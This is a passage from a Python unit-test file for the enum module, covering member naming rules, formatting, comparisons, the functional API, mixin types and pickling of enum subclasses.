self.assertRaises(ValueError): class Wrong(Enum): mro = 9 with self.assertRaises(ValueError): class Wrong(Enum): _create_= 11 with self.assertRaises(ValueError): class Wrong(Enum): _get_mixins_ = 9 with self.assertRaises(ValueError): class Wrong(Enum): _find_new_ = 1 with self.assertRaises(ValueError): class Wrong(Enum): _any_name_ = 9 def test_bool(self): # plain Enum members are always True class Logic(Enum): true = True false = False self.assertTrue(Logic.true) self.assertTrue(Logic.false) # unless overridden class RealLogic(Enum): true = True false = False def __bool__(self): return bool(self._value_) self.assertTrue(RealLogic.true) self.assertFalse(RealLogic.false) # mixed Enums depend on mixed-in type class IntLogic(int, Enum): true = 1 
false = 0 self.assertTrue(IntLogic.true) self.assertFalse(IntLogic.false) @unittest.skipIf( python_version >= (3, 12), '__contains__ now returns True/False for all inputs', ) def test_contains_er(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 3 in Season with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'AUTUMN' in Season val = Season(3) self.assertIn(val, Season) # class OtherEnum(Enum): one = 1; two = 2 self.assertNotIn(OtherEnum.two, Season) @unittest.skipIf( python_version < (3, 12), '__contains__ only works with enum memmbers before 3.12', ) def test_contains_tf(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) self.assertTrue(3 in Season) self.assertFalse('AUTUMN' in Season) val = Season(3) self.assertIn(val, Season) # class OtherEnum(Enum): one = 1; two = 2 self.assertNotIn(OtherEnum.two, Season) def test_comparisons(self): Season = self.Season with self.assertRaises(TypeError): Season.SPRING < Season.WINTER with self.assertRaises(TypeError): Season.SPRING > 4 self.assertNotEqual(Season.SPRING, 1) class Part(Enum): SPRING = 1 CLIP = 2 BARREL = 3 self.assertNotEqual(Season.SPRING, Part.SPRING) with self.assertRaises(TypeError): Season.SPRING < Part.CLIP def test_enum_duplicates(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = FALL = 3 WINTER = 4 ANOTHER_SPRING = 1 lst = list(Season) self.assertEqual( lst, [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER, ]) self.assertIs(Season.FALL, Season.AUTUMN) self.assertEqual(Season.FALL.value, 3) self.assertEqual(Season.AUTUMN.value, 3) self.assertIs(Season(3), Season.AUTUMN) self.assertIs(Season(1), Season.SPRING) self.assertEqual(Season.FALL.name, 'AUTUMN') self.assertEqual( [k for k,v in Season.__members__.items() if v.name != k], ['FALL', 'ANOTHER_SPRING'], ) def test_duplicate_name(self): with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 
2 blue = 3 red = 4 with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 def red(self): return 'red' with self.assertRaises(TypeError): class Color(Enum): @property def red(self): return 'redder' red = 1 green = 2 blue = 3 def test_reserved__sunder_(self): with self.assertRaisesRegex( ValueError, '_sunder_ names, such as ._bad_., are reserved', ): class Bad(Enum): _bad_ = 1 def test_enum_with_value_name(self): class Huh(Enum): name = 1 value = 2 self.assertEqual( list(Huh), [Huh.name, Huh.value], ) self.assertIs(type(Huh.name), Huh) self.assertEqual(Huh.name.name, 'name') self.assertEqual(Huh.name.value, 1) def test_format_enum(self): Season = self.Season self.assertEqual('{}'.format(Season.SPRING), '{}'.format(str(Season.SPRING))) self.assertEqual( '{:}'.format(Season.SPRING), '{:}'.format(str(Season.SPRING))) self.assertEqual('{:20}'.format(Season.SPRING), '{:20}'.format(str(Season.SPRING))) self.assertEqual('{:^20}'.format(Season.SPRING), '{:^20}'.format(str(Season.SPRING))) self.assertEqual('{:>20}'.format(Season.SPRING), '{:>20}'.format(str(Season.SPRING))) self.assertEqual('{:<20}'.format(Season.SPRING), '{:<20}'.format(str(Season.SPRING))) def test_str_override_enum(self): class EnumWithStrOverrides(Enum): one = auto() two = auto() def __str__(self): return 'Str!' self.assertEqual(str(EnumWithStrOverrides.one), 'Str!') self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!') def test_format_override_enum(self): class EnumWithFormatOverride(Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'Format!!' self.assertEqual(str(EnumWithFormatOverride.one), 'one') self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!') def test_str_and_format_override_enum(self): class EnumWithStrFormatOverrides(Enum): one = auto() two = auto() def __str__(self): return 'Str!' def __format__(self, spec): return 'Format!' 
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!') self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!') def test_str_override_mixin(self): class MixinEnumWithStrOverride(float, Enum): one = 1.0 two = 2.0 def __str__(self): return 'Overridden!' self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!') self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!') def test_str_and_format_override_mixin(self): class MixinWithStrFormatOverrides(float, Enum): one = 1.0 two = 2.0 def __str__(self): return 'Str!' def __format__(self, spec): return 'Format!' self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!') self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!') def test_format_override_mixin(self): class TestFloat(float, Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'TestFloat success!' self.assertEqual(str(TestFloat.one), 'one') self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!') @unittest.skipIf( python_version < (3, 12), 'mixin-format is still using member.value', ) def test_mixin_format_warning(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 self.assertEqual(f'{self.Grades.B}', 'B') @unittest.skipIf( python_version >= (3, 12), 'mixin-format now uses member instead of member.value', ) def test_mixin_format_warning(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 with self.assertWarns(DeprecationWarning): self.assertEqual(f'{Grades.B}', '4') def assertFormatIsValue(self, spec, member): if python_version < (3, 12) and (not spec or spec in ('{}','{:}')): with self.assertWarns(DeprecationWarning): self.assertEqual(spec.format(member), spec.format(member.value)) else: self.assertEqual(spec.format(member), spec.format(member.value)) def test_format_enum_date(self): Holiday = self.Holiday self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:20}', 
Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH) def test_format_enum_float(self): Konstants = self.Konstants self.assertFormatIsValue('{}', Konstants.TAU) self.assertFormatIsValue('{:}', Konstants.TAU) self.assertFormatIsValue('{:20}', Konstants.TAU) self.assertFormatIsValue('{:^20}', Konstants.TAU) self.assertFormatIsValue('{:>20}', Konstants.TAU) self.assertFormatIsValue('{:<20}', Konstants.TAU) self.assertFormatIsValue('{:n}', Konstants.TAU) self.assertFormatIsValue('{:5.2}', Konstants.TAU) self.assertFormatIsValue('{:f}', Konstants.TAU) def test_format_enum_int(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 self.assertFormatIsValue('{}', Grades.C) self.assertFormatIsValue('{:}', Grades.C) self.assertFormatIsValue('{:20}', Grades.C) self.assertFormatIsValue('{:^20}', Grades.C) self.assertFormatIsValue('{:>20}', Grades.C) self.assertFormatIsValue('{:<20}', Grades.C) self.assertFormatIsValue('{:+}', Grades.C) self.assertFormatIsValue('{:08X}', Grades.C) self.assertFormatIsValue('{:b}', Grades.C) def test_format_enum_str(self): Directional = self.Directional self.assertFormatIsValue('{}', Directional.WEST) self.assertFormatIsValue('{:}', Directional.WEST) self.assertFormatIsValue('{:20}', Directional.WEST) self.assertFormatIsValue('{:^20}', Directional.WEST) self.assertFormatIsValue('{:>20}', Directional.WEST) self.assertFormatIsValue('{:<20}', Directional.WEST) def test_object_str_override(self): class Colors(Enum): RED, GREEN, BLUE = 1, 2, 3 def __repr__(self): return "test.%s" % (self._name_, ) __str__ = object.__str__ self.assertEqual(str(Colors.RED), 'test.RED') def test_enum_str_override(self): class MyStrEnum(Enum): def __str__(self): return 'MyStr' class 
MyMethodEnum(Enum): def hello(self): return 'Hello! My name is %s' % self.name class Test1Enum(MyMethodEnum, int, MyStrEnum): One = 1 Two = 2 self.assertTrue(Test1Enum._member_type_ is int) self.assertEqual(str(Test1Enum.One), 'MyStr') self.assertEqual(format(Test1Enum.One, ''), 'MyStr') # class Test2Enum(MyStrEnum, MyMethodEnum): One = 1 Two = 2 self.assertEqual(str(Test2Enum.One), 'MyStr') self.assertEqual(format(Test1Enum.One, ''), 'MyStr') def test_inherited_data_type(self): class HexInt(int): def __repr__(self): return hex(self) class MyEnum(HexInt, enum.Enum): A = 1 B = 2 C = 3 def __repr__(self): return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_) self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>') # class SillyInt(HexInt): __qualname__ = 'SillyInt' pass class MyOtherEnum(SillyInt, enum.Enum): __qualname__ = 'MyOtherEnum' D = 4 E = 5 F = 6 self.assertIs(MyOtherEnum._member_type_, SillyInt) globals()['SillyInt'] = SillyInt globals()['MyOtherEnum'] = MyOtherEnum test_pickle_dump_load(self.assertIs, MyOtherEnum.E) test_pickle_dump_load(self.assertIs, MyOtherEnum) # # This did not work in 3.9, but does now with pickling by name class UnBrokenInt(int): __qualname__ = 'UnBrokenInt' def __new__(cls, value): return int.__new__(cls, value) class MyUnBrokenEnum(UnBrokenInt, Enum): __qualname__ = 'MyUnBrokenEnum' G = 7 H = 8 I = 9 self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt) self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G) globals()['UnBrokenInt'] = UnBrokenInt globals()['MyUnBrokenEnum'] = MyUnBrokenEnum test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I) test_pickle_dump_load(self.assertIs, MyUnBrokenEnum) def test_too_many_data_types(self): with self.assertRaisesRegex(TypeError, 'too many data types'): class Huh(str, int, Enum): One = 1 class MyStr(str): def hello(self): return 'hello, %s' % self class MyInt(int): def repr(self): return hex(self) with self.assertRaisesRegex(TypeError, 'too many data types'): class Huh(MyStr, 
MyInt, Enum): One = 1 def test_value_auto_assign(self): class Some(Enum): def __new__(cls, val): return object.__new__(cls) x = 1 y = 2 self.assertEqual(Some.x.value, 1) self.assertEqual(Some.y.value, 2) def test_hash(self): Season = self.Season dates = {} dates[Season.WINTER] = '1225' dates[Season.SPRING] = '0315' dates[Season.SUMMER] = '0704' dates[Season.AUTUMN] = '1031' self.assertEqual(dates[Season.AUTUMN], '1031') def test_intenum_from_scratch(self): class phy(int, Enum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_intenum_inherited(self): class IntEnum(int, Enum): pass class phy(IntEnum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_from_scratch(self): class phy(float, Enum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_inherited(self): class FloatEnum(float, Enum): pass class phy(FloatEnum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_strenum_from_scratch(self): class phy(str, Enum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_strenum_inherited_methods(self): class phy(StrEnum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) self.assertEqual(phy.pi.upper(), 'PI') self.assertEqual(phy.tau.count('a'), 1) def test_intenum(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c') self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2]) lst = list(WeekDay) self.assertEqual(len(lst), len(WeekDay)) self.assertEqual(len(WeekDay), 7) target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY' target = target.split() for i, weekday in enumerate(target, 1): e = WeekDay(i) self.assertEqual(e, i) self.assertEqual(int(e), i) self.assertEqual(e.name, weekday) self.assertIn(e, WeekDay) self.assertEqual(lst.index(e)+1, i) self.assertTrue(0 < e < 8) self.assertIs(type(e), WeekDay) self.assertIsInstance(e, int) 
self.assertIsInstance(e, Enum) def test_intenum_duplicates(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = TEUSDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY) self.assertEqual(WeekDay(3).name, 'TUESDAY') self.assertEqual([k for k,v in WeekDay.__members__.items() if v.name != k], ['TEUSDAY', ]) def test_intenum_from_bytes(self): self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE) with self.assertRaises(ValueError): IntStooges.from_bytes(b'\x00\x05', 'big') def test_floatenum_fromhex(self): h = float.hex(FloatStooges.MOE.value) self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE) h = float.hex(FloatStooges.MOE.value + 0.01) with self.assertRaises(ValueError): FloatStooges.fromhex(h) def test_pickle_enum(self): if isinstance(Stooges, Exception): raise Stooges test_pickle_dump_load(self.assertIs, Stooges.CURLY) test_pickle_dump_load(self.assertIs, Stooges) def test_pickle_int(self): if isinstance(IntStooges, Exception): raise IntStooges test_pickle_dump_load(self.assertIs, IntStooges.CURLY) test_pickle_dump_load(self.assertIs, IntStooges) def test_pickle_float(self): if isinstance(FloatStooges, Exception): raise FloatStooges test_pickle_dump_load(self.assertIs, FloatStooges.CURLY) test_pickle_dump_load(self.assertIs, FloatStooges) def test_pickle_enum_function(self): if isinstance(Answer, Exception): raise Answer test_pickle_dump_load(self.assertIs, Answer.him) test_pickle_dump_load(self.assertIs, Answer) def test_pickle_enum_function_with_module(self): if isinstance(Question, Exception): raise Question test_pickle_dump_load(self.assertIs, Question.who) test_pickle_dump_load(self.assertIs, Question) def test_enum_function_with_qualname(self): if isinstance(Theory, Exception): raise Theory self.assertEqual(Theory.__qualname__, 'spanish_inquisition') def test_class_nested_enum_and_pickle_protocol_four(self): # would normally just have this directly in the class namespace 
class NestedEnum(Enum): twigs = 'common' shiny = 'rare' self.__class__.NestedEnum = NestedEnum self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__ test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs) def test_pickle_by_name(self): class ReplaceGlobalInt(IntEnum): ONE = 1 TWO = 2 ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name for proto in range(HIGHEST_PROTOCOL): self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO') def test_exploding_pickle(self): BadPickle = Enum( 'BadPickle', 'dill sweet bread-n-butter', module=__name__) globals()['BadPickle'] = BadPickle # now break BadPickle to test exception raising enum._make_class_unpicklable(BadPickle) test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill) test_pickle_exception(self.assertRaises, PicklingError, BadPickle) def test_string_enum(self): class SkillLevel(str, Enum): master = 'what is the sound of one hand clapping?' journeyman = 'why did the chicken cross the road?' apprentice = 'knock, knock!' 
self.assertEqual(SkillLevel.apprentice, 'knock, knock!') def test_getattr_getitem(self): class Period(Enum): morning = 1 noon = 2 evening = 3 night = 4 self.assertIs(Period(2), Period.noon) self.assertIs(getattr(Period, 'night'), Period.night) self.assertIs(Period['morning'], Period.morning) def test_getattr_dunder(self): Season = self.Season self.assertTrue(getattr(Season, '__eq__')) def test_iteration_order(self): class Season(Enum): SUMMER = 2 WINTER = 4 AUTUMN = 3 SPRING = 1 self.assertEqual( list(Season), [Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING], ) def test_reversed_iteration_order(self): self.assertEqual( list(reversed(self.Season)), [self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER, self.Season.SPRING] ) def test_programmatic_function_string(self): SummerMonth = Enum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', start=10) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 10): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august']) lst = list(SummerMonth) 
self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list_with_start(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 20): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_iterable(self): SummerMonth = Enum( 'SummerMonth', (('june', 1), ('july', 2), ('august', 3)) ) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_from_dict(self): SummerMonth = Enum( 'SummerMonth', OrderedDict((('june', 1), ('july', 2), ('august', 3))) ) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) 
self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 30): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass(self): SummerMonth = IntEnum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( [SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass_with_start(self): SummerMonth = IntEnum('SummerMonth', 'june july august', start=40) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual( 
[SummerMonth.june, SummerMonth.july, SummerMonth.august], lst, ) for i, month in enumerate('june july august'.split(), 40): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_subclassing(self): if isinstance(Name, Exception): raise Name self.assertEqual(Name.BDFL, 'Guido van Rossum') self.assertTrue(Name.BDFL, Name('Guido van Rossum')) self.assertIs(Name.BDFL, getattr(Name, 'BDFL')) test_pickle_dump_load(self.assertIs, Name.BDFL) def test_extending(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"): class EvenMoreColor(Color, IntEnum): chartruese = 7 def test_exclude_methods(self): class whatever(Enum): this = 'that' these = 'those' def really(self): return 'no, not %s' % self.value self.assertIsNot(type(whatever.really), whatever) self.assertEqual(whatever.this.really(), 'no, not that') def test_wrong_inheritance_order(self): with self.assertRaises(TypeError): class Wrong(Enum, str): NotHere = 'error before this point' def test_intenum_transitivity(self): class number(IntEnum): one = 1 two = 2 three = 3 class numero(IntEnum): uno = 1 dos = 2 tres = 3 self.assertEqual(number.one, numero.uno) self.assertEqual(number.two, numero.dos) self.assertEqual(number.three, numero.tres) def test_wrong_enum_in_call(self): class Monochrome(Enum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_wrong_enum_in_mixed_call(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_mixed_enum_in_call_1(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 
self.assertIs(Monochrome(Gender.female), Monochrome.white) def test_mixed_enum_in_call_2(self): class Monochrome(Enum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.male), Monochrome.black) def test_flufl_enum(self): class Fluflnum(Enum): def __int__(self): return int(self.value) class MailManOptions(Fluflnum): option1 = 1 option2 = 2 option3 = 3 self.assertEqual(int(MailManOptions.option1), 1) def test_introspection(self): class Number(IntEnum): one = 100 two = 200 self.assertIs(Number.one._member_type_, int) self.assertIs(Number._member_type_, int) class String(str, Enum): yarn = 'soft' rope = 'rough' wire = 'hard' self.assertIs(String.yarn._member_type_, str) self.assertIs(String._member_type_, str) class Plain(Enum): vanilla = 'white' one = 1 self.assertIs(Plain.vanilla._member_type_, object) self.assertIs(Plain._member_type_, object) def test_no_such_enum_member(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): Color(4) with self.assertRaises(KeyError): Color['chartreuse'] def test_new_repr(self): class Color(Enum): red = 1 green = 2 blue = 3 def __repr__(self): return "don't you just love shades of %s?" % self.name self.assertEqual( repr(Color.blue), "don't you just love shades of blue?", ) def test_inherited_repr(self): class MyEnum(Enum): def __repr__(self): return "My name is %s." 
% self.name class MyIntEnum(int, MyEnum): this = 1 that = 2 theother = 3 self.assertEqual(repr(MyIntEnum.that), "My name is that.") def test_multiple_mixin_mro(self): class auto_enum(type(Enum)): def __new__(metacls, cls, bases, classdict): temp = type(classdict)() temp._cls_name = cls names = set(classdict._member_names) i = 0 for k in classdict._member_names: v = classdict[k] if v is Ellipsis: v = i else: i = v i += 1 temp[k] = v for k, v in classdict.items(): if k not in names: temp[k] = v return super(auto_enum, metacls).__new__( metacls, cls, bases, temp) class AutoNumberedEnum(Enum, metaclass=auto_enum): pass class AutoIntEnum(IntEnum, metaclass=auto_enum): pass class TestAutoNumber(AutoNumberedEnum): a = ... b = 3 c = ... class TestAutoInt(AutoIntEnum): a = ... b = 3 c = ... def test_subclasses_with_getnewargs(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs__(self): return self._args @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) 
self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_getnewargs_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs_ex__(self): return self._args, {} @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def 
test_subclasses_with_reduce(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce__(self): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): # repr() is updated to include the name and type info return "{}({!r}, {})".format( type(self).__name__, self.__name__, int.__repr__(self), ) def __str__(self): # str() is unchanged, even if it relies on the repr() fallback base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) # for simplicity, we only define one operator that # propagates expressions def __add__(self, other): temp = int(self) + int( other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt( '({0} + {1})'.format(self.__name__, other.__name__), temp, ) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' # needed for pickle protocol 4 x = ('the-x', 1) y = ('the-y', 2) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' # needed for pickle protocol 4 def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError("name and value must be specified") self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce_ex__(self, proto): return self.__class__, self._args @property def 
__name__(self):
            return self._intname
        def __repr__(self):
            # repr() is updated to include the name and type info
            return "{}({!r}, {})".format(
                    type(self).__name__,
                    self.__name__,
                    int.__repr__(self),
                    )
        def __str__(self):
            # str() is unchanged, even if it relies on the repr() fallback
            base = int
            base_str = base.__str__
            if base_str.__objclass__ is object:
                return base.__repr__(self)
            return base_str(self)
        # for simplicity, we only define one operator that
        # propagates expressions
        def __add__(self, other):
            temp = int(self) + int( other)
